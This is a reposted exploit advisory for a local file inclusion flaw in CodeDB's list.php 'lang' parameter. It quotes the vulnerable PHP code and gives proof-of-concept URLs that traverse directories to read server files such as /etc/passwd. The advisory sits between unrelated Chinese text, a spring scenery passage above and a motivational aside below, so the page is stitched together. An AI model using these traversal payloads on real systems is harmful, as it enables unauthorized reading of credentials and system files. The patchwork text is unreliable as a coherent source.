柳树舒展开了黄绿嫩叶的枝条,在微微的春风中轻柔地拂动,就像一群群身着绿装的仙女在翩翩起舞。夹在柳树中间的桃树也开出了鲜艳的花朵,绿的柳,红的花,真是美极了!
################################################################################
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Author : cOndemned
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################
Source :
// list.php
2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol
7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension
8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d
Proof of Concept :
http://[host]/[codeDB_path]/list.php?lang=../readme.txt
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd
http://[host]/[codeDB_path]/list.php?lang=../[local_file]
EoF.
本文CodeDB (list.php lang) Local File Inclusion Vulnerability 到此结束。要假设你融不到一分钱的情景去做事业。小编再次感谢大家对我们的支持!